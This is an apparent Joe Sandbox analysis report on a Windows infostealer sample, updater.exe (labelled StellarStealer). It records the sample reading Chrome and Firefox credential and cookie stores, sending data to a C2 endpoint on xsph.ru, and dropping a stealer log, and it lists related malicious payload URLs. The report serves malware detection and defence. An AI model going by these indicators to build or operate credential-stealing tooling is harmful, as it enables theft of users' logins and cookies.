          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013F61B5 GetLongPathNameW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,1_2_013F61B5
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013F6127 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,1_2_013F6127
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0140E44C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0140E44C
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_014124FE VirtualProtect ?,-00000001,00000104,?,?,?,0000001C1_2_014124FE
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013CA518 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,1_2_013CA518
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013B4455 GetProcessHeap,1_2_013B4455
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_01420095 mov eax, dword ptr fs:[00000030h]1_2_01420095
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_01412780 mov eax, dword ptr fs:[00000030h]1_2_01412780
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0140E5AE SetUnhandledExceptionFilter,1_2_0140E5AE
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0140E44C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0140E44C
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0140E9B2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0140E9B2
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0141337D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0141337D
          Source: C:\Users\user\Desktop\updater.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\updater.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\updater.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\updater.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\updater.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,1_2_0142A932
          Source: C:\Users\user\Desktop\updater.exeCode function: EnumSystemLocalesW,1_2_0142ABD4
          Source: C:\Users\user\Desktop\updater.exeCode function: EnumSystemLocalesW,1_2_0142AC1F
          Source: C:\Users\user\Desktop\updater.exeCode function: EnumSystemLocalesW,1_2_0142ACBA
          Source: C:\Users\user\Desktop\updater.exeCode function: GetLocaleInfoW,1_2_0142AF96
          Source: C:\Users\user\Desktop\updater.exeCode function: GetLocaleInfoW,1_2_0142AF98
          Source: C:\Users\user\Desktop\updater.exeCode function: GetLocaleInfoW,1_2_0142B1C4
          Source: C:\Users\user\Desktop\updater.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_0142B0BE
          Source: C:\Users\user\Desktop\updater.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_0142B293
          Source: C:\Users\user\Desktop\updater.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW,1_2_0140D58A
          Source: C:\Users\user\Desktop\updater.exeCode function: EnumSystemLocalesW,1_2_0141F7EF
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0140E678 cpuid 1_2_0140E678
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0141FDA7 GetSystemTimeAsFileTime,1_2_0141FDA7
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_01423BF4 _free,GetTimeZoneInformation,_free,1_2_01423BF4
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013D2F5C GetVersionExA,1_2_013D2F5C

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: updater.exe, type: SAMPLE
          Source: Yara matchFile source: 1.0.updater.exe.13b0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.updater.exe.13b0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: Process Memory Space: updater.exe PID: 2364, type: MEMORYSTR
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.dbJump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.dbJump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.dbJump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: updater.exe, type: SAMPLE
          Source: Yara matchFile source: 1.0.updater.exe.13b0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.updater.exe.13b0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: Process Memory Space: updater.exe PID: 2364, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API
          Path InterceptionPath Interception1
          Virtualization/Sandbox Evasion
          1
          OS Credential Dumping
          2
          System Time Discovery
          Remote Services1
          Screen Capture
          Exfiltration Over Other Network Medium2
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools
          LSASS Memory2
          Security Software Discovery
          Remote Desktop Protocol1
          Archive Collected Data
          Exfiltration Over Bluetooth2
          Non-Application Layer Protocol
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Deobfuscate/Decode Files or Information
          Security Account Manager1
          Virtualization/Sandbox Evasion
          SMB/Windows Admin Shares1
          Man in the Browser
          Automated Exfiltration12
          Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
          Obfuscated Files or Information
          NTDS2
          Process Discovery
          Distributed Component Object Model1
          Data from Local System
          Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
          Remote System Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials2
          File and Directory Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync34
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          updater.exe85%VirustotalBrowse
          updater.exe92%ReversingLabsWin32.Trojan.StellarStealer
          updater.exe100%AviraHEUR/AGEN.1305371
          updater.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://ns.adobe.c/s0%URL Reputationsafe
          http://ns.adobede0%URL Reputationsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          f0837288.xsph.ru
          141.8.192.151
          truefalse
            high
            windowsupdatebg.s.llnwi.net
            178.79.225.0
            truefalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://f0837288.xsph.rufalse
                high
                http://f0837288.xsph.ru/collect.phpfalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://ac.ecosia.org/autocomplete?q=TTFJYWWSOQ.CMMEDGCGG.1.drfalse
                    high
                    https://duckduckgo.com/chrome_newtabTTFJYWWSOQ.CMMEDGCGG.1.drfalse
                      high
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=TTFJYWWSOQ.CMMEDGCGG.1.drfalse
                        high
                        http://ns.adobe.c/supdater.exe, 00000001.00000002.1124428852.000000000018D000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://duckduckgo.com/ac/?q=TTFJYWWSOQ.CMMEDGCGG.1.drfalse
                          high
                          https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchTTFJYWWSOQ.CMMEDGCGG.1.drfalse
                            high
                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=TTFJYWWSOQ.CMMEDGCGG.1.drfalse
                              high
                              https://www.google.com/favicon.icoTTFJYWWSOQ.CMMEDGCGG.1.drfalse
                                high
                                https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=TTFJYWWSOQ.CMMEDGCGG.1.drfalse
                                  high
                                  http://ns.adobedeupdater.exe, 00000001.00000002.1124403437.0000000000026000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  141.8.192.151
                                  f0837288.xsph.ruRussian Federation
                                  35278SPRINTHOSTRUfalse
                                  Joe Sandbox Version:38.0.0 Beryl
                                  Analysis ID:1266489
                                  Start date and time:2023-07-04 11:17:01 +02:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 5m 46s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                  Run name:Run with higher sleep bypass
                                  Number of analysed new started processes analysed:3
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample file name:updater.exe
                                  Detection:MAL
                                  Classification:mal92.troj.spyw.winEXE@1/5@1/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HDC Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 90
                                  • Number of non-executed functions: 145
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                  • Stop behavior analysis, all processes terminated
                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                  • Excluded IPs from analysis (whitelisted): 173.222.108.210, 173.222.108.226
                                  • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net
                                  • Report size getting too big, too many NtOpenFile calls found.
                                  • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  No simulations
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  141.8.192.151ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeGet hashmaliciousAzorultBrowse
                                  • f0355889.xsph.ru/Panel/index.php
                                  gOKMPhOLiN.exeGet hashmaliciousPhoenix Miner, ccminerBrowse
                                  • f0758246.xsph.ru//zima.php?mine=ETC
                                  DWG Material, Standard BS 4360 GR. 40A43A.jarGet hashmaliciousUnknownBrowse
                                  • f0719949.xsph.ru/dropbox.exe
                                  DWG Material, Standard BS 4360 GR. 40A43A.jarGet hashmaliciousUnknownBrowse
                                  • f0719949.xsph.ru/dropbox.exe
                                  dropbox.exeGet hashmaliciousUnknownBrowse
                                  • f0719949.xsph.ru/Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh
                                  DWG spare parts 455RTMGF Model.exeGet hashmaliciousRemcosBrowse
                                  • f0719949.xsph.ru/Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh
                                  NotaFiscal.msiGet hashmaliciousUnknownBrowse
                                  • f0717271.xsph.ru/serv.php
                                  Revised sales contract for Crosswear.rtfGet hashmaliciousSnake KeyloggerBrowse
                                  • f0705964.xsph.ru/mum.exe
                                  cxbqjWw79R.exeGet hashmaliciousXmrigBrowse
                                  • f0702521.xsph.ru/cmd.php?hwid=computer%5Cuser&gpuname=88P9A4OS;%20&mining=1&active=XMR
                                  IVBPFW.exeGet hashmaliciousUnknownBrowse
                                  • f0702055.xsph.ru/ng.txt
                                  NOPL-25-JULY-001.docGet hashmaliciousRemcosBrowse
                                  • f0699262.xsph.ru/letter.exe
                                  300618c6e81ee458a3aba4188f0f24937f62974991428.exeGet hashmaliciousRedLine, Remcos, XmrigBrowse
                                  • f0699616.xsph.ru/RATTCRYPT.exe
                                  http://f0688845.xsph.ru/index.phpGet hashmaliciousUnknownBrowse
                                  • f0688845.xsph.ru/favicon.ico
                                  18561381.exeGet hashmaliciousRedLineBrowse
                                  • f0645594.xsph.ru/build.exe
                                  bd250e1cb4f8d322a5464549dc067ac7bcbecfc2d4fca.exeGet hashmaliciousRedLine Remcos XmrigBrowse
                                  • f0641877.xsph.ru/lam1di.exe
                                  9WPRwZwY47.exeGet hashmaliciousRedLineBrowse
                                  • f0624763.xsph.ru/MicrosoftApi.exe
                                  2a09Y5NsoG.exeGet hashmaliciousAmadey RedLine SmokeLoader Tofsee VidarBrowse
                                  • f0611101.xsph.ru/1.exe
                                  NFe_09112021123.msiGet hashmaliciousHidden Macro 4.0Browse
                                  • f0589562.xsph.ru//arqvs//zlibai.dll
                                  VapeV4Installer (2).exeGet hashmaliciousUnknownBrowse
                                  • f0587499.xsph.ru/dop.exe
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  windowsupdatebg.s.llnwi.netMitsubishi_PO_2_2023,_Colombo_02.exeGet hashmaliciousAgentTeslaBrowse
                                  • 95.140.230.192
                                  payment_copy$10,200.exeGet hashmaliciousAgentTesla, NSISDropperBrowse
                                  • 95.140.230.128
                                  GJMyNZWtW94DfXw.exeGet hashmaliciousAgentTeslaBrowse
                                  • 95.140.230.192
                                  Ql697IjuB0.exeGet hashmaliciousAmadey, SmokeLoaderBrowse
                                  • 95.140.230.128
                                  CcsplKLNUD.exeGet hashmaliciousRedLineBrowse
                                  • 178.79.225.128
                                  103603-81075327-LBP23103603039.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                  • 178.79.225.0
                                  SALE_ORDER_30062023.exeGet hashmaliciousAgentTeslaBrowse
                                  • 95.140.230.128
                                  SOA_50970351.exeGet hashmaliciousAgentTeslaBrowse
                                  • 178.79.225.128
                                  u8F8Ukww3S.exeGet hashmaliciousCobaltStrike, Metasploit, ReflectiveLoaderBrowse
                                  • 178.79.225.0
                                  303629.exeGet hashmaliciousCobaltStrikeBrowse
                                  • 178.79.225.0
                                  file.exeGet hashmaliciousRedLine, zgRATBrowse
                                  • 95.140.230.128
                                  file.exeGet hashmaliciousAgentTeslaBrowse
                                  • 95.140.230.192
                                  TT_PAYMENT.exeGet hashmaliciousAgentTeslaBrowse
                                  • 95.140.230.128
                                  SALE_ORDER_30062023.exeGet hashmaliciousAgentTeslaBrowse
                                  • 178.79.225.128
                                  INVOICE_PAYMENT_COPY_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                  • 95.140.230.128
                                  FjW0ESmeMr.exeGet hashmaliciousRedLineBrowse
                                  • 95.140.230.128
                                  Payment_Slip_For_Bank_Transfer.exeGet hashmaliciousAgentTeslaBrowse
                                  • 178.79.225.0
                                  file.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                  • 95.140.230.192
                                  decode_5822a45e3f842d6ba3c92b21f88e942ff13b8cd571826188b7ad85771882f5e3.exeGet hashmaliciousAsyncRATBrowse
                                  • 95.140.230.192
                                  decode_0b4d10612b33e871a7943747ea7063a884b3a9fe25cb1df3eb7a493afb175272.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                  • 95.140.230.192
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  SPRINTHOSTRUal7OvZOSKy.exeGet hashmaliciousDCRatBrowse
                                  • 141.8.197.42
                                  1iakzzaLRr.exeGet hashmaliciousDCRatBrowse
                                  • 141.8.197.42
                                  HEUR-Backdoor.MSIL.LightStone.gen-8e6d8d43b27.exeGet hashmaliciousDCRatBrowse
                                  • 141.8.197.42
                                  HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exeGet hashmaliciousBlackNETBrowse
                                  • 141.8.197.42
                                  http://f0827197.xsph.ru/000/0101/battle/?login=john.gdoe@arcadia.ioGet hashmaliciousUnknownBrowse
                                  • 141.8.192.151
                                  acctspay ACH_INSTRUCTIONSpdf.shtmlGet hashmaliciousUnknownBrowse
                                  • 141.8.192.169
                                  file.exeGet hashmaliciousTofseeBrowse
                                  • 185.185.68.207
                                  rskovbrand.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 141.8.192.93
                                  7SzUgdO8Ne.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 141.8.192.93
                                  Archd.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 141.8.192.93
                                  file.exeGet hashmaliciousTofseeBrowse
                                  • 141.8.195.197
                                  Y0VyFqYj2i.exeGet hashmaliciousTofseeBrowse
                                  • 141.8.195.197
                                  5zZPgwyy8n.exeGet hashmaliciousTofseeBrowse
                                  • 141.8.195.197
                                  vk8Xlb1vw3.exeGet hashmaliciousTofseeBrowse
                                  • 141.8.195.197
                                  file.exeGet hashmaliciousTofseeBrowse
                                  • 141.8.195.197
                                  file.exeGet hashmaliciousAmadey, Fabookie, PrivateLoader, RedLine, TofseeBrowse
                                  • 185.185.70.73
                                  Gardenizes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 141.8.192.93
                                  ufuldkommenhederne.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 141.8.192.93
                                  file.exeGet hashmaliciousTofseeBrowse
                                  • 185.185.70.73
                                  No context
                                  No context
                                  Process:C:\Users\user\Desktop\updater.exe
                                  File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):1655906
                                  Entropy (8bit):7.869590651791305
                                  Encrypted:false
                                  SSDEEP:24576:wFKC89ItI18Hu7YtxBxJ4CMbsJi9QseA9RXILPhCy1fkAhNdgstcl46MPpjq00fm:095OiFzbMmLaRXGPcyHhNdttccPlN0fm
                                  MD5:D023FF70A46797EA3435EF0B1F0487D3
                                  SHA1:98AF68749BE9B55062C9810856722AF0D2B28DAE
                                  SHA-256:168EDA3C0D120F111BFE8E23A7C8DFEF84BBE6505D88ED20C16E3D76E3357307
                                  SHA-512:5DC77B760E7B13C5E42C2FBB06CA35284008343F31510D5244B67D883F01F46FD3B28B27DA7465BE9C6FA352951C3CCF310C3192C79AC3DDC7A3F9E32831C295
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...fE...}N'D.Q.....N.......s.#Q..D1`B...(.t.......&..M.nrNJF@rF]..[.V...p.A..y...ZU{._c...S..:.6<..1..p9.91. .7<.Fq[.&..6.9h'....O.20.4k........^rFMX.5.9...p.......]O)s..I.>.:.......`.I.%4z...h\b....O.Sc.d.=..Lq.)....S.~...{@.`....~....n....cxl...NC......7...n..XV.7..u...y^7l..:......=.[w...q....7...y..y=f.F..p-.9v....I[...g#......b.e4..[...R....m..r._"k.y.....T..5cf........|~6.....l.3...V`..Vn.e..V..k.1..z%.5.k!.kh.j..7....'}..V.v.....1E..| .]......f>_c....|.....z%]C..$]..V.3.....p.h=..c,1......1...\.w.Sc...h.....v...v9'_'.s...h..}.+..|.....>.skX..}du..gx...i..r=..\>[.u.CN.MF#.|...rv......m.X...z`nb.....yM...9...c}.2.b.rF6..p.270...1....f....c4..gi|4.-.=...=..z....98......Zq...9.......gr.F.q{L.a..q..3....<...Gs.c..~9>z.9...i.Th%6.Hn....0G.D.#..\..4.5.'.8.k.'.t.u.....R.r.X^.n<.0..F...o0..S.U&...[.5...e.!.o=..........O<Hj..B.D....:\'...N8.+2....
                                  Process:C:\Users\user\Desktop\updater.exe
                                  File Type:ASCII text, with very long lines (690)
                                  Category:dropped
                                  Size (bytes):1401
                                  Entropy (8bit):5.0777728481751625
                                  Encrypted:false
                                  SSDEEP:24:JLWmPFn+wnlqc8jlwVs3sI2GPfQQttE6sC63tpsC63tGEpDVD:9dlqc8joE2QB1B6nB6UMD
                                  MD5:C4EF4F766ADD2492805FA188B0D4589D
                                  SHA1:E01A63D81464C41507E6C08092AEB512D040B3F4
                                  SHA-256:545570454417671F0DC0A5F67BEB7495FB4329EFCFFEFEDF4AC092D3C13DE327
                                  SHA-512:6EABC640538BEA2DC27DAAA0A06E75A36B99DC2FD5695D41C5C9F612D48181FB65539B6A1EC2124239824E95C6171809F962F6B2AB8419FA9643A5A594B807D9
                                  Malicious:false
                                  Reputation:low
                                  Preview:www.mozilla.org.FALSE./.0.1510052761.moz-notification-fx-out-of-date.fx-out-of-date-banner..mozilla.org.FALSE./.0.1823598364.optimizelyEndUserId.oeu1508238364462r0.17947700943881573..mozilla.org.FALSE./.0.1823598364.optimizelySegments.%7B%22245617832%22%3A%22none%22%2C%22245677587%22%3A%22ff%22%2C%22245875585%22%3A%22direct%22%2C%22246048108%22%3A%22false%22%7D..246059135.log.optimizely.com.FALSE./.0.1823598366.end_user_id.oeu1508238364462r0.17947700943881573..mozilla.org.FALSE./.0.1823598366.optimizelyBuckets.%7B%7D..mozilla.org.FALSE./.0.1508238381.optimizelyPendingLogEvents.%5B%22n%3Doptly_activate%26u%3Doeu1508238364462r0.17947700943881573%26wxhr%3Dtrue%26time%3D1508238364.494%26f%3D8540095929%2C8784714594%26g%3D%22%2C%22n%3Dhttps%253A%252F%252Fwww.mozilla.org%252Fen-US%252Ffirefox%252F52.0.1%252Ffirstrun%252F%253Ff%253D102%26u%3Doeu1508238364462r0.17947700943881573%26wxhr%3Dtrue%26time%3D1508238364.446%26f%3D8540095929%2C8784714594%26g%3D859230343%22%2C%22n%3Dhttps%253A%252F%252Fw
                                  Process:C:\Users\user\Desktop\updater.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):742
                                  Entropy (8bit):4.525356477602935
                                  Encrypted:false
                                  SSDEEP:12:SxPrJi2YSCqTR/Us/5xcIx4GmsD8UzmHZEgX59i91M:KPV/YueixcIx4GmsDL6FX59iI
                                  MD5:723DF53F07B53D015354CAC195DB3535
                                  SHA1:808DFCF03285475EEDE8D3F415C0A8B8AFCD83CB
                                  SHA-256:A3FB68DD23FCFD77774B25B3D37C184428A6C8BD5ACA6245E64691E1F8E17B6F
                                  SHA-512:92AD81881F09E88593A7E713657D7D0C5A03E72E03D9EAB095129F8665D0F5C1DA3AA260F605F86B4ED90C4A104B9CDBA7983147F8FE0627581FC0B627CB3D94
                                  Malicious:false
                                  Reputation:low
                                  Preview:System hash: b4c8ac298ecd13471647646125ed843d.Build: 1029702468.Version: 1.11.Build name: @traffer.----------------------------------------------------.[BETA BUILD v1.11] COLLECTOR PROJECT.----------------------------------------------------..System: Windows 7 (x64)..AutoFill: 0.Passwords: 0.Cookies: 9.Cards: 0..Atomic: -.Armory: -.Bytecoin: -.BitcoinCore: -.DashCore: -.Litecoin: -.Electrum: -.Zcash: -.Ethereum: -..Authy (2FA): -.Files: 8.FileZilla: -.NordVPN: -.Telegram: -.Discord: -.PSI: -.Wallet: -.Pidgin: -.Steam: -...----------------------------------------------------.Startup path: C:\Users\user\Desktop\updater.exe.Start time: Tue Jul 4 11:18:01 2023.Get log time: 3 sec..----------------------------------------------------..
                                  Process:C:\Users\user\Desktop\updater.exe
                                  File Type:SQLite 3.x database, user version 7, last written using SQLite version 3024000, page size 32768, file counter 5, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 4
                                  Category:dropped
                                  Size (bytes):524288
                                  Entropy (8bit):0.08108430995212909
                                  Encrypted:false
                                  SSDEEP:48:De8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DeUm7ii+7Ue1AQ98VVY
                                  MD5:2B9F6CFC2BFEAD36B3B619A65FD9759C
                                  SHA1:78B8225E9B528E5A5EA35EB1649CBDB334A44A3C
                                  SHA-256:E6C938035A1B57C0A47FB3B55797B6BFA056CC62360F4893F31D8F39102368D4
                                  SHA-512:97A3B2B689C33502FB25DE2CE42AE4F5F0260F7679A8E36D16782D2775A5BB28B7BC03B0814F5E588C133EB95F6E0E2CA0BD2E7BBCB4838FB29BDEF855D5E9F7
                                  Malicious:false
                                  Reputation:low
                                  Preview:SQLite format 3......@ ..........................................................................$......}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\updater.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 4, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 4
                                  Category:dropped
                                  Size (bytes):77824
                                  Entropy (8bit):1.1340767975888557
                                  Encrypted:false
                                  SSDEEP:96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
                                  MD5:9A38AC1D3304A8EEFD9C54D4EADCCCD6
                                  SHA1:56E953B2827B37491BC80E3BFDBBF535F95EDFA7
                                  SHA-256:67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
                                  SHA-512:32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):6.7660386658610205
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:updater.exe
                                  File size:698'280 bytes
                                  MD5:5b7111ae32c04c641c56e81a6293ec48
                                  SHA1:77331d9725c41635d6d449414c8a0d4ee00fac63
                                  SHA256:4cedab343fc4581149b13b7f6fd6532fa2c437550dee42926b37a93c6b5997f9
                                  SHA512:d7d9c38e7e909e057c64c091e33cc118df3b7503e11345919613462ed006d91f8b5c8e302b599fb740cb55eb3a4c030fbf5ed5febdb4c2e83752325f26124e78
